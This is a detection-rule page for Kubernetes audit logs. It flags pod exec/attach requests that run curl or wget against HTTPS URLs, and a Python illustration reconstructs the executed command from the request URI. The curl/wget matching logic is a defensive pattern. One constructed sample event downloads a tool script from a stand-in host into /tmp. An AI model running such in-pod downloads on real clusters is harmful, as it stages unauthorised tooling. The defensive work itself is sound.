
Summary
Technical summary: This rule monitors Kubernetes audit logs for exec/attach activity targeting a pod. It decodes the requestURI, extracts the command portion from URL parameters, and reconstructs a readable command. It flags cases where the executed command contains curl or wget and accesses an HTTPS URL. Noise filters exclude common cluster health endpoints and well-known OIDC/JWKS endpoints to reduce benign alerts. The alert exposes the decoded_uri and reconstructed Esql.executed_command for investigation. MITRE mappings cover T1609 (Container Administration Command) and T1105 (Ingress Tool Transfer). The goal is to detect unauthorized tooling download, staging, or data exfiltration initiated via an exec into a pod, while minimizing false positives from routine health checks or first-party endpoints.
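The decode-and-match logic the summary describes, as an added Python illustration (not the rule's own ES|QL query): it rebuilds the executed command from the repeated `command=` parameters of an exec/attach `requestURI`, then flags curl/wget reaching an `https://` URL. The exclusion suffixes, the `decode_exec_request`/`is_suspicious`/`evaluate` names and the sample events are assumptions for the example, since the page does not list the rule's exact patterns.

```python
from urllib.parse import urlsplit, parse_qs, unquote, quote

# Assumed exclusion list: the page names the categories (cluster health, OIDC/JWKS)
# but not the rule's exact patterns, so these path suffixes are illustrative.
NOISE_PATH_SUFFIXES = ("/healthz", "/readyz", "/livez", "/openid/v1/jwks",
                       "/.well-known/openid-configuration", "/.well-known/jwks.json")

def decode_exec_request(request_uri):
    """Return (decoded_uri, executed_command) for a pod exec/attach request, else None."""
    parts = urlsplit(request_uri)
    if not parts.path.endswith(("/exec", "/attach")):
        return None
    # Each argv element arrives as a repeated ?command= parameter, in order,
    # so joining the decoded values rebuilds the executed command line.
    argv = parse_qs(parts.query).get("command", [])
    return unquote(request_uri), " ".join(argv)

def is_noise_url(url):
    path = urlsplit(url).path.rstrip("/")
    return any(path.endswith(s) for s in NOISE_PATH_SUFFIXES)

def is_suspicious(executed_command):
    """True for curl/wget (matched by basename) reaching an https:// URL not on the noise list."""
    argv = executed_command.split()
    if not any(tok.rsplit("/", 1)[-1] in ("curl", "wget") for tok in argv):
        return False
    urls = [tok for tok in argv if tok.startswith("https://")]
    return any(not is_noise_url(u) for u in urls)

def evaluate(events):
    """Apply the rule to audit events; each alert carries decoded_uri and executed_command."""
    alerts = []
    for ev in events:
        decoded = decode_exec_request(ev.get("requestURI", ""))
        if decoded and is_suspicious(decoded[1]):
            alerts.append({**ev, "decoded_uri": decoded[0], "executed_command": decoded[1]})
    return alerts

def _exec_uri(*argv):
    # Constructs a requestURI encoded the way the API server logs a kubectl exec.
    q = "&".join("command=" + quote(a, safe="") for a in argv)
    return "/api/v1/namespaces/prod/pods/web-0/exec?" + q + "&container=web&stdout=true"

# Constructed sample events, not real audit data: only the first should alert.
SAMPLE_EVENTS = [
    {"verb": "create", "requestURI": _exec_uri("curl", "-sSL", "https://example.invalid/tool.sh", "-o", "/tmp/t")},
    {"verb": "create", "requestURI": _exec_uri("curl", "-s", "https://kubernetes.default.svc/healthz")},
    {"verb": "create", "requestURI": _exec_uri("/usr/bin/wget", "-qO-", "https://idp.example.invalid/.well-known/openid-configuration")},
    {"verb": "create", "requestURI": _exec_uri("ls", "-la")},
]
```

Running `evaluate(SAMPLE_EVENTS)` yields one alert whose `executed_command` reads `curl -sSL https://example.invalid/tool.sh -o /tmp/t`; the health-probe and OIDC fetches are filtered as noise and the plain `ls` never matches.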
Categories
- Kubernetes
Data Sources
- Pod
- Process
- Command
ATT&CK Techniques
- T1609
- T1105
Created: 2026-04-23